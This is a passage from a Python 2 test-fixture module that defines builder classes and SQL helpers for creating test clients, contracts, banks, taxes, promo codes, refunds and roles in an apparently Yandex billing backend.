contract_id=contract.id,\n credit=1)\n else:\n invoices = coreobj.pay_on_credit(\n request_id=req.id,\n paysys_id=paysys.id if paysys else 1000,\n person_id=contract.person.id,\n contract_id=contract.id)\n\n self.session.flush()\n return invoices\n\n def get_contract(self, **params):\n b_client = ClientBuilder()\n b_person = PersonBuilder(client=b_client, type='ph').build(self.session)\n\n if 'firm' not in params:\n params['firm'] = 1\n if 'currency' not in params:\n params['currency'] = self.session.query(mapper.Currency).getone(\n char_code=self.session.query(mapper.Firm).getone(params['firm']).default_currency).num_code\n\n params['is_signed'] = datetime.datetime.now() if params.get('is_signed') else None\n _params = {'client': b_client, 'person': b_person}\n _params.update(params)\n b_contract = ContractBuilder(\n **_params\n )\n cont = b_contract.build(self.session).obj\n\n cont.col0.is_signed = datetime.datetime.now()\n\n for p, v in params.iteritems():\n if p in ['person_id', 'client_id']:\n setattr(cont, p, v)\n else:\n setattr(cont.col0, p, v)\n self.session.flush()\n\n return cont\n\n def get_product_hierarchy(self, **params):\n '''activity type hierarchy tree:\n p[0]\n | \\\n p[1] p[2]\n |\n p[3]\n '''\n p = [ProductBuilder(**params) for x in xrange(4)]\n for x in [(3, 1), (1, 0), (2, 0)]:\n p[x[0]].b.activity_type.b.parent = p[x[1]].b.activity_type\n\n # Pre-build activity_types to generate their IDs.\n [product.b.activity_type.build(self.session) for product in p]\n\n return p\n\n def get_credits_available(self, b_basket, cont):\n if not isinstance(b_basket, BasketBuilder):\n raise ut.INVALID_PARAM('BasketBuilder expected')\n\n b_request = RequestBuilder(basket=b_basket)\n b_invoice = InvoiceBuilder(request=b_request, person=cont.person, contract=cont)\n inv = b_invoice.build(self.session).obj\n\n return inv.get_credit_available()\n\n\nclass JobDescrBuilder(ObjectBuilder):\n _class = JobDescr\n\n def prepare(self, **params):\n self.b.name = \"name\"\n self.b.command = \"command\"\n super(JobDescrBuilder, self).prepare(**params)\n\n\nclass JobScheduleBuilder(ObjectBuilder):\n _class = JobSchedule\n\n def prepare(self, **params):\n self.b.name = \"name\"\n self.b.crontab = \"* * * * *\"\n super(JobScheduleBuilder, self).prepare(**params)\n\n\nclass PromoCodeBuilder(ObjectBuilder):\n _class = mapper.PromoCode\n\n\nclass PromoCodeGroupBuilder(ObjectBuilder):\n _class = None\n\n def prepare(self, **params):\n calc_class_name = params.pop('calc_class_name', 'FixedDiscountPromoCodeGroup')\n self._class = getattr(mapper, calc_class_name)\n self.b.calc_class_name = calc_class_name\n self.b.service_ids = params.get('service_ids', [7])\n self.b._product_ids = params.pop('product_ids', None)\n\n promocode_info_list = params.pop(\n 'promocode_info_list',\n [{'code': str(generate_numeric_string(16)), 'client_id': None}]\n )\n self.b.promocodes = [\n PromoCodeBuilder(code=promocode_info['code'], client_id=promocode_info['client_id'])\n for promocode_info in promocode_info_list\n ]\n\n event = params.get('event', None)\n if 'event_name' in params:\n event = mapper.PromoCodeEvent(event=params['event_name'])\n self.b.event = event\n\n self.b.start_dt = datetime.datetime.now() - datetime.timedelta(days=1)\n self.b.end_dt = datetime.datetime.now() + datetime.timedelta(days=7)\n self.b.firm_id = FirmId.YANDEX_OOO\n\n calc_params = params.pop('calc_params', {u\"discount_pct\": u\"66\"})\n if 'apply_on_create' not in calc_params:\n calc_params['apply_on_create'] = params.pop('apply_on_create', False)\n self.b.calc_params = calc_params\n\n super(PromoCodeGroupBuilder, self).prepare(**params)\n\n\nclass BankBuilder(ObjectBuilder):\n _class = mapper.Bank\n _generate_id = True\n\n def prepare(self, **params):\n self.b.name = 'Test Bank'\n self.b.bik = '012345678'\n self.b.city = u'Москва'\n self.b.hidden = 0\n super(BankBuilder, self).prepare(**params)\n\n\nclass BankIntBuilder(ObjectBuilder):\n _class = mapper.BankIntClass\n\n def prepare(self, **params):\n self.b.bictypeint = params.pop('bictypeint', 'SWIFT')\n self.b.bicint = params.pop('bicint', '0123456789A')\n self.b.name = 'Test Bank'\n self.b.rplstatus = 1\n self.b.client = 0\n self.b.update_dt = datetime.datetime.now()\n super(BankIntBuilder, self).prepare(**params)\n\n\nclass ExportBuilder(ObjectBuilder):\n _class = mapper.Export\n\n\nclass CountryBuilder(ObjectBuilder):\n _class = mapper.Country\n\n def prepare(self, **params):\n self.b.region_id = get_big_number()\n self.b.region_name = u'Новое Кукуево'\n self.b.region_name_en = u'New Kukuevo'\n super(CountryBuilder, self).prepare(**params)\n\n\nclass PersonCategoryBuilder(ObjectBuilder):\n _class = mapper.PersonCategory\n\n def prepare(self, **params):\n self.b.country = params.pop('country', Getter(mapper.Country, 225))\n self.b.ur = params.pop('ur', 1)\n self.b.resident = params.pop('resident', 1)\n self.b.is_default = params.pop('is_default', 1)\n self.b.auto_only = 0\n self.b.category = '%s_%s' % (params.get('cc', 'cat'), get_big_number())\n\n from balance.person import mandatory_fields\n mandatory_fields[self.b.category] = tuple()\n\n self.b.oebs_country_code = params.pop('oebs_country_code', 66) # 6\n super(PersonCategoryBuilder, self).prepare(**params)\n\n\nclass FirmBuilder(ObjectBuilder):\n _class = mapper.Firm\n\n def prepare(self, **params):\n self.b.id = random.randint(2000, 9999)\n self.b.email = 'test@balance.yandex'\n self.b.payment_invoice_email = 'test@balance.yandex'\n self.b.phone = '-6(666)666-66-66'\n self.b.country = params.pop('country', Getter(mapper.Country, 225))\n self.b.default_iso_currency = 'RUB'\n super(FirmBuilder, self).prepare(**params)\n\n\nclass FirmInterbranchBuilder(ObjectBuilder):\n _class = mapper.FirmInterbranch\n\n def prepare(self, **params):\n self.b.id = get_big_number()\n self.b.firm = params.get('firm') or FirmBuilder()\n self.b.root_firm = params.get('root_firm') or FirmBuilder()\n self.b.contract = params.get('contract') or ContractBuilder()\n self.b.invoice_paysys_id = PAYSYS_ID\n super(FirmInterbranchBuilder, self).prepare(**params)\n\n\nclass YadocFirmBuilder(ObjectBuilder):\n _class = mapper.YadocFirm\n\n def prepare(self, **params):\n if not params.get('firm'):\n params.setdefault('firm_id', FirmId.YANDEX_OOO)\n params.setdefault('last_closed_dt', None)\n super(YadocFirmBuilder, self).prepare(**params)\n\n\nclass TaxPolicyPctBuilder(ObjectBuilder):\n _class = mapper.TaxPolicyPct\n\n def prepare(self, **params):\n self.b.id = get_big_number()\n self.b.hidden = 0\n super(TaxPolicyPctBuilder, self).prepare(**params)\n\n\nclass TaxPolicyBuilder(ObjectBuilder):\n _class = mapper.TaxPolicy\n\n def prepare(self, **params):\n self.b.id = get_big_number()\n self.b.name = 'some_tax'\n self.b.resident = params.pop('resident', 1)\n self.b.region_id = params.pop('region_id', 225)\n self.b.default_tax = 1\n self.b.hidden = 0\n\n tax_pcts = params.pop('tax_pcts', [18])\n\n def _cr_tax_pct(pct_param):\n pct_param = _mk_list(pct_param)\n\n if len(pct_param) == 1:\n nds_pct, = pct_param\n nsp_pct = 0\n dt = datetime.datetime(2000, 1, 1)\n elif len(pct_param) == 2:\n dt, nds_pct = pct_param\n nsp_pct = 0\n else:\n dt, nds_pct, nsp_pct = pct_param\n\n return TaxPolicyPctBuilder(\n tax_policy_id=self.b.id,\n dt=dt,\n nds_pct=nds_pct,\n nsp_pct=nsp_pct\n )\n\n self.b.taxes = map(_cr_tax_pct, tax_pcts)\n\n super(TaxPolicyBuilder, self).prepare(**params)\n\n\nclass FiasCity(ObjectBuilder):\n _class = mapper.fias.FiasCity\n\n\nclass PaysysBuilder(ObjectBuilder):\n _class = mapper.Paysys\n _generate_id = True\n\n def prepare(self, category='ur', **kwargs):\n self.b.category = category\n super(PaysysBuilder, self).prepare(**kwargs)\n\n\nclass FiasBuilder(ObjectBuilder):\n _class = mapper.Fias\n\n KLADR_CODE_LENGTH = 11\n\n def prepare(self, with_kladr=True, parent_fias=None, formal_name='formal_name', short_name=u'к.',\n postcode='123456', **kwargs):\n self.b.guid = str(uuid.uuid4())\n self.b.obj_level = 1\n self.b.live_status = 1\n self.b.center_status = 0\n self.b.formal_name = formal_name\n self.b.short_name = short_name\n self.b.postcode = postcode\n if with_kladr:\n self.b.kladr_code = generate_numeric_string(length=FiasBuilder.KLADR_CODE_LENGTH)\n if parent_fias:\n self.b.parent_guid = parent_fias.guid\n super(FiasBuilder, self).prepare(**kwargs)\n\n\nclass CurrencyBuilder(ObjectBuilder):\n _class = mapper.Currency\n\n def prepare(self, **kwargs):\n self.b.char_code = generate_character_string(length=4).upper()\n self.b.iso_code = generate_character_string(length=4).upper()\n self.b.num_code = get_big_number()\n self.b.weight = RANDOM.randint(1, 200)\n super(CurrencyBuilder, self).prepare(**kwargs)\n\n\nclass IsoCurrencyBuilder(ObjectBuilder):\n _class = mapper.IsoCurrency\n\n def prepare(self, **kwargs):\n self.b.alpha_code = generate_character_string(length=3).upper()\n super(IsoCurrencyBuilder, self).prepare(**kwargs)\n\n\nclass CurrencyRateBuilder(ObjectBuilder):\n _class = mapper.CurrencyRate\n\n\nclass DistributionTagBuilder(ObjectBuilder):\n _class = mapper.DistributionTag\n\n def prepare(self, client_id, tag_id=None, name='test_tag'):\n self.b.client_id = client_id\n self.b.name = name\n self.b.id = tag_id\n\n def build(self, session):\n if self.b.id is None:\n self.b.id = session.execute(\n \"SELECT s_test_distribution_tag_id.nextval AS tag_id FROM dual\"\n ).fetchone()['tag_id']\n return super(DistributionTagBuilder, self).build(session)\n\n\nclass PageDataBuilder(ObjectBuilder):\n _class = mapper.PageData\n\n def prepare(self, page_id=None, dt=None, desc=None, nds=None, **kwargs):\n self.b.page_id = page_id\n self.b.dt = dt or datetime.datetime.now()\n self.b.desc = desc or 'test page data'\n self.b.nds = nds or 0\n\n def build(self, session):\n if self.b.page_id is None:\n self.b.page_id = session.execute(\n \"select max(page_id)+1 as page_id from T_PAGE_DATA\"\n ).fetchone()['page_id']\n return super(PageDataBuilder, self).build(session)\n\n\nclass VerificationCodeBuilder(ObjectBuilder):\n _class = mapper.VerificationCode\n\n def prepare(self, **params):\n self.b.dt = datetime.datetime.now()\n super(VerificationCodeBuilder, self).prepare(**params)\n\n\nclass OverdraftParamsBuilder(ObjectBuilder):\n _class = mapper.OverdraftParams\n _generate_id = True\n\n def prepare(self, **params):\n client = ClientBuilder()\n self.b.client = client\n self.b.service_id = ServiceId.DIRECT\n self.b.person = PersonBuilder(client=client, type='ph')\n self.b.payment_method_cc = 'card'\n self.b.iso_currency = 'RUB'\n self.b.client_limit = 100\n super(OverdraftParamsBuilder, self).prepare(**params)\n\n\nclass ClientCashbackBuilder(ObjectBuilder):\n _class = mapper.ClientCashback\n\n def prepare(self, **params):\n if 'client_id' in params:\n self.b.client_id = params['client_id']\n else:\n self.b.client = params.pop('client', ClientBuilder())\n self.b.service_id = params.pop('service_id', ServiceId.DIRECT)\n self.b.iso_currency = params.pop('iso_currency', 'RUB')\n self.b.bonus = params.pop('bonus', D('1'))\n self.b.start_dt = params.pop('start_dt', None)\n self.b.finish_dt = params.pop('finish_dt', None)\n super(ClientCashbackBuilder, self).prepare(**params)\n\n\nclass CashbackUsageBuilder(ObjectBuilder):\n _class = mapper.CashbackUsage\n\n\nclass CashbackSettingsBuilder(ObjectBuilder):\n _class = mapper.ClientCashbackSettings\n\n\nclass PaymentBankBuilder(ObjectBuilder):\n _class = mapper.PaymentBank\n _generate_id = True\n\n def prepare(self, **params):\n self.b.name = 'ЗАО \"Банка\"'\n super(PaymentBankBuilder, self).prepare(**params)\n\n\nclass BankDetailsBuilder(ObjectBuilder):\n _class = mapper.BankDetails\n _generate_id = True\n\n def prepare(self, **params):\n self.b.payment_bank = PaymentBankBuilder()\n self.b.bank = params.pop('bank', 'ЗАО БАНК \"Мамой клянусь\"')\n self.b.iso_currency = 'RUR'\n super(BankDetailsBuilder, self).prepare(**params)\n\n\nclass ClientBankBuilder(ObjectBuilder):\n _class = mapper.ClientBank\n _generate_id = True\n\n def prepare(self, **params):\n self.b.is_alien_repr = params.pop('is_alien_repr', False)\n self.b.currency_code = params.pop('currency_code', 'RUR')\n self.b.iso_currency = mapper.Currency.fix_iso_code(self.b.currency_code)\n super(ClientBankBuilder, self).prepare(**params)\n\n\nclass TrustPaymentBuilder(ObjectBuilder):\n _class = payments.TrustPayment\n\n def prepare(self, **params):\n invoice = params.get('invoice', None)\n if not invoice:\n params['invoice'] = InvoiceBuilder()\n super(TrustPaymentBuilder, self).prepare(**params)\n\n\nclass SidePaymentBuilder(ObjectBuilder):\n _class = mapper.SidePayment\n\n def prepare(self, **params):\n if 'transaction_dt' not in params:\n self.b.transaction_dt = datetime.datetime.now()\n super(SidePaymentBuilder, self).prepare(**params)\n\n\nclass FiscalReceiptBuilder(ObjectBuilder):\n _class = mapper.FiscalReceipt\n\n def prepare(self, **params):\n params.setdefault('fiscal_receipt', {\n 'dt': datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S'),\n 'id': str(generate_int(6)),\n 'fp': str(generate_int(10)),\n 'fn': {\n 'sn': str(generate_int(16))\n },\n 'kkt': {\n 'rn': str(generate_int(13))\n },\n 'receipt_content': {\n 'receipt_type': params.pop('receipt_type', 'return_income')\n },\n 'receipt_calculated_content': {\n 'total': str(generate_int(3))\n },\n 'email': generate_character_string(25),\n 'invoice_id': str(generate_int(10)),\n 'service_id': str(generate_int(10))\n })\n super(FiscalReceiptBuilder, self).prepare(**params)\n\n\nclass RoleBuilder(ObjectBuilder):\n _class = mapper.Role\n\n def prepare(self, **params):\n self.b.name = 'test_role_name'\n super(self.__class__, self).prepare(**params)\n\n\nclass RoleClientGroupBuilder(ObjectBuilder):\n _class = mapper.RoleClientGroup\n\n def prepare(self, **params):\n self._clients = params.pop('clients', [])\n super(RoleClientGroupBuilder, self).prepare(**params)\n\n def build(self, session):\n if self.b.get('client_batch_id') is None:\n self.b.client_batch_id = session.execute(sa.func.next_value(sa.Sequence('s_client_batch_id'))).scalar()\n\n if self.b.get('external_id') is None:\n self.b.external_id = get_big_number()\n\n refresh_dt = self.b.get('refresh_dt')\n for client in self._clients:\n params = {\n 'client': client,\n 'client_batch_id': self.b.client_batch_id,\n }\n if refresh_dt:\n params['update_dt'] = refresh_dt\n RoleClientBuilder.construct(session, **params)\n\n super(RoleClientGroupBuilder, self).build(session)\n return self\n\n\nclass RoleClientBuilder(ObjectBuilder):\n _class = mapper.RoleClient\n\n def prepare(self, **params):\n self._group_id = params.pop('group_id', None)\n\n if not (params.get('client') or params.get('client_id')):\n params['client'] = ClientBuilder()\n\n super(RoleClientBuilder, self).prepare(**params)\n\n def build(self, session):\n if self.b.get('client_batch_id') is None:\n if self._group_id:\n self.b.client_batch_id = RoleClientGroupBuilder.construct(session,\n external_id=self._group_id).client_batch_id\n else:\n self.b.client_batch_id = session.execute(sa.func.next_value(sa.Sequence('s_client_batch_id'))).scalar()\n\n super(RoleClientBuilder, self).build(session)\n return self\n\n\nclass RoleClientPassportBuilder(ObjectBuilder):\n _class = mapper.RoleClientPassport\n\n def prepare(self, **params):\n if not (params.get('role') or params.get('role_id')):\n self.b.role_id = RoleType.REPRESENTATIVE\n if not (params.get('client') or params.get('client_id')):\n self.b.client = ClientBuilder()\n if not (params.get('passport') or params.get('passport_id')):\n self.b.passport = PassportBuilder()\n super(RoleClientPassportBuilder, self).prepare(**params)\n\n\nclass TariffGroupBuilder(ObjectBuilder):\n _class = mapper.TariffGroup\n\n def prepare(self, **params):\n self.b.cc = 'test_tariff_group_cc'\n self.b.service_id = params.pop('service_id', ServiceId.APIKEYS)\n super(TariffGroupBuilder, self).prepare(**params)\n\n\nclass TariffBuilder(ObjectBuilder):\n _class = mapper.Tariff\n\n def prepare(self, **params):\n self.b.cc = 'test_tariff_cc'\n self.b.tariff_group = TariffGroupBuilder()\n super(TariffBuilder, self).prepare(**params)\n\n\nclass ProdSeasonCoeffBuilder(ObjectBuilder):\n _class = mapper.ProdSeasonCoeff\n\n\nclass PartnerBalanceCache(ObjectBuilder):\n _class = mapper.PartnerBalanceCache\n\n\nclass CartItemBuilder(ObjectBuilder):\n _class = mapper.CartItem\n\n def prepare(self, **params):\n client = params.get('client', None)\n client_id = params.get('client_id', None)\n if not (client or client_id):\n params['client'] = ClientBuilder()\n\n order = params.get('order', None)\n service_id = params.get('service_id', None)\n service_order_id = params.get('service_order_id', None)\n if not (order or (service_id and service_order_id)):\n params['order'] = OrderBuilder()\n\n params.setdefault('quantity', D('12.34'))\n\n super(CartItemBuilder, self).prepare(**params)\n\n\nclass ServiceNotifyParamsBuilder(ObjectBuilder):\n _class = mapper.ServiceNotifyParams\n\n def prepare(self, **params):\n from notifier.data_objects import JSON_REST\n\n service = params.get('service', None)\n service_id = params.get('service_id', None)\n if not (service or service_id):\n params['service'] = ServiceBuilder()\n\n url_scheme = params.pop('url_scheme', 'https')\n params.setdefault('url', '{}://service.yandex.net/api'.format(url_scheme))\n params.setdefault('test_url', '{}://service-dev.yandex.net/api'.format(url_scheme))\n\n params.setdefault('hidden', False)\n params.setdefault('version', 1)\n params.setdefault('protocol', JSON_REST)\n params.setdefault('iface_version', 3)\n params.setdefault('tvm_alias', generate_character_string(10))\n\n super(ServiceNotifyParamsBuilder, self).prepare(**params)\n\n\nclass RefundBuilder(ObjectBuilder):\n _class = mapper.Refund\n\n\nclass TerminalBuilder(ObjectBuilder):\n _class = mapper.Terminal\n _generate_id = True\n\n def prepare(self, **params):\n self.b.dt = datetime.datetime.now()\n self.b.payment_method_id = 1001\n self.b.currency = 'RUB'\n super(TerminalBuilder, self).prepare(**params)\n\n\nclass ProcessingBuilder(ObjectBuilder):\n _class = mapper.Processing\n _generate_id = True\n\n def prepare(self, **params):\n self.b.dt = datetime.datetime.now()\n self.b.cc = 'TEST'\n self.b.name = 'Test_Name'\n self.b.payment_method_id = 1000\n super(ProcessingBuilder, self).prepare(**params)\n\n\nclass InvoiceRefundBuilder(ObjectBuilder):\n _class = mapper.OEBSInvoiceRefund\n\n def prepare(self, **params):\n self.b.status_code = InvoiceRefundStatus.not_exported\n super(InvoiceRefundBuilder, self).prepare(**params)\n\n def postprocess(self):\n self.b.invoice.notify_unused_funds()\n\n\nclass TrustInvoiceRefundBuilder(ObjectBuilder):\n _class = mapper.TrustApiCPFInvoiceRefund\n\n def prepare(self, **params):\n self.b.status_code = InvoiceRefundStatus.uninitialized\n super(TrustInvoiceRefundBuilder, self).prepare(**params)\n\n\nclass InvoiceTransferBuilder(ObjectBuilder):\n _class = mapper.InvoiceTransfer\n\n def prepare(self, **params):\n self.b.status_code = InvoiceTransferStatus.not_exported\n super(InvoiceTransferBuilder, self).prepare(**params)\n\n\nclass NirvanaClonedWorkflowBuilder(ObjectBuilder):\n _class = mapper.NirvanaClonedWorkflow\n\n def prepare(self, **params):\n current_dt = datetime.datetime.now()\n self.b.dt = datetime.datetime(current_dt.year, current_dt.month, 1)\n self.b.mnclose_task = 'mnclose_task'\n self.b.original_id = 'workflow-instance-to-be-cloned'\n self.b.instance_id = 'cloned-instance-id'\n\n super(NirvanaClonedWorkflowBuilder, self).prepare(**params)\n\n\nclass NirvanaMnCloseSyncBuilder(ObjectBuilder):\n _class = mapper.NirvanaMnCloseSync\n\n def prepare(self, **kwargs):\n self.b.task_id = kwargs.pop('task_id', 'mnclose_task_id')\n current_dt = datetime.datetime.now()\n self.b.dt = kwargs.pop('dt', datetime.datetime(current_dt.year, current_dt.month, 1))\n self.b.status = kwargs.pop('status', NirvanaTaskStatus.TASK_STATUS_NEW_UNOPENABLE)\n self.b.changed_dt = current_dt\n\n super(NirvanaMnCloseSyncBuilder, self).prepare(**kwargs)\n\n\nclass ProductNameBuilder(ObjectBuilder):\n _class = mapper.ProductName\n\n def prepare(self, **params):\n params.setdefault('product', ProductBuilder())\n params.setdefault('lang_id', LanguageId.RU)\n if 'product_name' not in params:\n product_name = params['product'].name\n if isinstance(product_name, unicode):\n format_string = u'{}_{}'\n else:\n format_string = '{}_{}'\n params['product_name'] = format_string.format(product_name, params['lang_id'])\n super(ProductNameBuilder, self).prepare(**params)\n\n\nclass ThirdPartyTransactionBuilder(ObjectBuilder):\n _class = mapper.ThirdPartyTransaction\n _generate_id = True\n\n def prepare(self, **kwargs):\n current_dt = datetime.datetime.now()\n self.b.dt = datetime.datetime(current_dt.year, current_dt.month, 1)\n self.b.contract = kwargs.get('contract')\n super(ThirdPartyTransactionBuilder, self).prepare(**kwargs)\n\n\nclass NirvanaBlockBuilder(ObjectBuilder):\n _class = mapper.NirvanaBlock\n\n def prepare(self, **kwargs):\n current_dt = datetime.datetime.now()\n self.b.dt = datetime.datetime(current_dt.year, current_dt.month, 1)\n self.b.operation = 'run_mnclose_task'\n self.b.instance_id = str(uuid.uuid4())\n self.b.terminate = 0\n self.b.request = kwargs.pop('request', {'data': {'options': {}}})\n self.b.response = {}\n self.b.status = self._class.Status.RUNNING\n self.b.pid = os.getpid()\n\n super(NirvanaBlockBuilder, self).prepare(**kwargs)\n\n def add_input(self, name, data_type='text', download_url=None):\n inputs = self.b.request['data'].setdefault('inputs', dict())\n input_ = inputs.setdefault(name, dict(name=name, type='INPUT', items=list()))\n\n input_items = input_['items']\n current_index = len(input_items)\n\n if download_url is None:\n download_url = 'http://localhost/nirvana/api/storage/{}/data'.format(current_index)\n\n input_['items'].append({\n 'dataType': data_type,\n 'downloadURL': download_url,\n 'fileName': '{}_{}'.format(current_index, name),\n })\n return self\n\n def add_output(self, name, data_type='text', upload_url=None):\n outputs = self.b.request['data'].setdefault('outputs', dict())\n output = outputs.setdefault(name, dict(name=name, type='OUTPUT', items=list()))\n\n output_items = output['items']\n current_index = len(output_items)\n\n if upload_url is None:\n upload_url = 'mds-s3://localhost/s3/nirvana/{}'.format(current_index)\n\n output['items'].append({\n 'dataType': data_type,\n 'uri': upload_url,\n 'fileName': '{}_{}'.format(current_index, name)\n })\n return self\n\n\nclass ReportBuilder(ObjectBuilder):\n _class = mapper.Report\n\n def prepare(self, **kwargs):\n self.b.request_dt = datetime.datetime.now()\n self.b.create_dt = datetime.datetime.now()\n self.b.params = {}\n super(ReportBuilder, self).prepare(**kwargs)\n\n def build(self, session):\n if self.b.get('key') is None:\n self.b.key = ('unittest666/'\n + str(session.execute(sa.sql.functions.next_value(sa.Sequence('s_mds_id'))).scalar())\n + '.xls')\n\n if self.b.get('passport_id') is None:\n self.b.passport_id = PassportBuilder.construct(session).passport_id\n\n return super(ReportBuilder, self).build(session)\n\n\nclass TVMACLAppBuidler(ObjectBuilder):\n _class = mapper.TVMACLApp\n\n def prepare(self, **params):\n params.setdefault('env', 'test')\n super(TVMACLAppBuidler, self).prepare(**params)\n\n\nclass TVMACLAllowedServiceBuilder(ObjectBuilder):\n _class = mapper.TVMACLAllowedServiceTable\n\n\nclass TVMACLPermissionBuilder(ObjectBuilder):\n _class = mapper.TVMACLPermissionTable\n\n\nclass TVMACLGroupBuilder(ObjectBuilder):\n _class = mapper.TVMACLGroup\n\n\nclass TVMACLGroupMethodBuilder(ObjectBuilder):\n _class = mapper.TVMACLGroupMethod\n\n\nclass TVMACLGroupPermissionBuilder(ObjectBuilder):\n _class = mapper.TVMACLGroupPermission\n\n\nclass RestrictedDomainBuilder(ObjectBuilder):\n _class = mapper.RestrictedDomain\n\n\nclass RestrictedPersonParamBuilder(ObjectBuilder):\n _class = mapper.RestrictedPersonParams\n\n\ndef create_client_service_data(migrate_to_currency_dt=datetime.datetime.now(), currency='RUB',\n currency_convert_type=CONVERT_TYPE_COPY, service_id=ServiceId.DIRECT):\n client_service_data = mapper.ClientServiceData(service_id)\n client_service_data.iso_currency = currency\n client_service_data.migrate_to_currency = migrate_to_currency_dt\n client_service_data.convert_type = currency_convert_type\n return client_service_data\n\n\ndef create_pay_policy_service(session, service_id, firm_id, paymethods_params=None, category=None, legal_entity=None,\n is_atypical=False,\n **kwargs):\n pay_policy_service_id = get_big_number()\n session.execute('''insert into bo.t_pay_policy_service (id, service_id, firm_id, legal_entity, category, is_atypical)\n values (:id, :service_id, :firm_id, :legal_entity, :category, :is_atypical)''',\n {'id': pay_policy_service_id, 'service_id': service_id, 'firm_id': firm_id,\n 'legal_entity': legal_entity, 'category': category, 'is_atypical': int(is_atypical)})\n if paymethods_params:\n for currency, pm_id in paymethods_params:\n create_pay_policy_payment_method(session, pay_policy_service_id=pay_policy_service_id, iso_currency=currency,\n payment_method_id=pm_id, hidden=0, **kwargs)\n session.flush()\n return pay_policy_service_id\n\n\ndef create_pay_policy_payment_method(session, pay_policy_service_id, iso_currency, payment_method_id, paysys_group_id=0,\n hidden=0, **kwargs):\n payment_method = Getter(mapper.PaymentMethod, payment_method_id).build(session).obj\n pay_policy_payment_method_id = get_big_number()\n pp = mapper.PayPolicyPaymentMethod(id=pay_policy_payment_method_id, pay_policy_service_id=pay_policy_service_id,\n iso_currency=iso_currency, payment_method=payment_method,\n paysys_group_id=paysys_group_id, hidden=hidden)\n session.add(pp)\n session.flush()\n return pp\n\n\ndef create_pay_policy_region(session, pay_policy_service_id, region_id=None, region_group_id=None, is_contract=None,\n is_agency=None, hidden=0, **kwargs):\n if is_contract is not None:\n is_contract = int(is_contract)\n if is_agency is not None:\n is_agency = int(is_agency)\n assert region_id is None or region_group_id is None\n pay_policy_region_id = get_big_number()\n if region_group_id:\n session.execute('''\n insert into bo.t_pay_policy_region (id, region_group_id, is_agency, is_contract, pay_policy_service_id, hidden)\n values (:id, :region_group_id, :is_agency, :is_contract, :pay_policy_service_id, :hidden)\n ''', {'id': pay_policy_region_id, 'pay_policy_service_id': pay_policy_service_id,\n 'region_group_id': region_group_id, 'is_contract': is_contract, 'is_agency': is_agency, 'hidden': 0})\n if region_id:\n session.execute('''\n insert into bo.t_pay_policy_region (id, region_id, is_agency, is_contract, pay_policy_service_id, hidden)\n values (:id, :region_id, :is_agency, :is_contract, :pay_policy_service_id, :hidden)\n ''', {'id': pay_policy_region_id, 'pay_policy_service_id': pay_policy_service_id, 'region_id': region_id,\n 'is_contract': is_contract, 'is_agency': is_agency, 'hidden': hidden})\n\n\ndef create_pay_policy_region_group(session, region_group_id, regions):\n region_group_name = generate_character_string()\n session.execute('''\n insert into bo.t_pay_policy_region_group_name (region_group_id, region_group_name)\n values (:region_group_id, :region_group_name)\n ''', {'region_group_id': region_group_id, 'region_group_name': region_group_name})\n for region in regions:\n pay_policy_region_group_id = get_big_number()\n session.execute('''\n insert into bo.t_pay_policy_region_group (id, region_group_id, region_id)\n values (:id, :region_group_id, :region_id)\n ''', {'id': pay_policy_region_group_id, 'region_group_id': region_group_id, 'region_id': region})\n\n\ndef create_permission(session, perm_code):\n permission = mapper.Permission(\n code=perm_code,\n )\n session.add(permission)\n session.flush()\n return permission\n\n\ndef create_role(session, *permissions, **kwargs):\n role = mapper.Role(\n id=get_big_number(),\n name=kwargs.get('name', str(get_big_number()))\n )\n session.add(role)\n if any(permissions):\n for perm_info in permissions:\n if not isinstance(perm_info, basestring) and isinstance(perm_info, collections.Iterable):\n perm_code, constraints = perm_info\n else:\n perm_code, constraints = perm_info, None\n\n if isinstance(perm_code, basestring):\n perm = create_permission(session, perm_code)\n else:\n perm = perm_code\n\n role_perm = mapper.RolePermission(\n role=role,\n permission=perm,\n constraints=constraints\n )\n session.add(role_perm)\n session.flush()\n return role\n\n\ndef get_domain_uid_value():\n return random.randint(INTRA_MIN(), INTRA_MAX())\n\n\ndef create_passport(session, *roles, **kwargs):\n patch_session = kwargs.get('patch_session', False)\n passport = PassportBuilder(**kwargs).build(session).obj\n for role_info in roles:\n if role_info is None:\n continue\n\n if not isinstance(role_info, collections.Iterable):\n role_info = (role_info,)\n\n role, firm_id, client_batch_id = (role_info + (None, None))[:3]\n\n passport_role = mapper.RealRolePassport(\n session,\n passport=passport,\n role=role,\n firm_id=firm_id,\n client_batch_id=client_batch_id,\n )\n session.add(passport_role)\n\n session.flush()\n if patch_session:\n session.oper_id = passport.passport_id\n try:\n del session.oper_perms\n except AttributeError:\n pass\n session._passport = passport\n return passport\n\n\ndef create_passport_manager(passport):\n return SingleManagerBuilder(\n passport_id=passport.passport_id,\n domain_login=passport.login\n ).build(passport.session).obj\n\n\ndef create_credit_contract(session, client=None, person=None, **kwargs):\n pc = PayOnCreditCase(session)\n client = client or ClientBuilder(is_agency=True)\n person = person or PersonBuilder(client=client, type='ur')\n\n params = dict(\n dt=datetime.datetime.now() - datetime.timedelta(days=66),\n commission=ContractTypeId.COMMISSION,\n payment_type=3,\n credit_type=1,\n payment_term=30,\n payment_term_max=60,\n personal_account=1,\n personal_account_fictive=1,\n currency=810,\n lift_credit_on_payment=1,\n commission_type=52,\n repayment_on_consume=1,\n credit_limit_single=1666666,\n services={7},\n is_signed=1,\n firm=1,\n )\n params.update(kwargs)\n return pc.get_contract(client=client, person=person, **params)\n\n\ndef create_correction_payment(invoice):\n invoice.session.execute(\n 'insert into bo.t_correction_payment (dt, doc_date, sum, memo, invoice_eid) '\n 'VALUES (to_date(:paymentDate,\\'DD.MM.YYYY HH24:MI:SS\\'),'\n 'to_date(:paymentDate,\\'DD.MM.YYYY HH24:MI:SS\\'),'\n ':total_sum,'\n '\\'Testing\\','\n ':external_id)',\n {'paymentDate': invoice.dt,\n 'total_sum': invoice.total_sum.as_decimal(),\n 'external_id': invoice.external_id})\n\n\ndef create_comsn_type_discount_types(session, commission_type_id, discount_type_ids):\n for discount_type_id in discount_type_ids:\n session.execute(\n \"\"\"insert into bo.t_comsn_type_discount_types (contract_comsn_type_id, discount_type_id)\n VALUES (:commission_type_id, :discount_type_id)\"\"\",\n {'commission_type_id': commission_type_id,\n 'discount_type_id': discount_type_id})\n\n\ndef create_contract_commission_type(session):\n seq = session.execute(sa.Sequence('S_CONTRACT_COMSN_TYPE_ID'))\n session.execute(\n \"\"\"insert into bo.T_CONTRACT_COMSN_TYPE (id, name)\n VALUES (:id, :name)\"\"\",\n {'name': 'comsn_name' + str(get_big_number()),\n 'id': seq})\n return 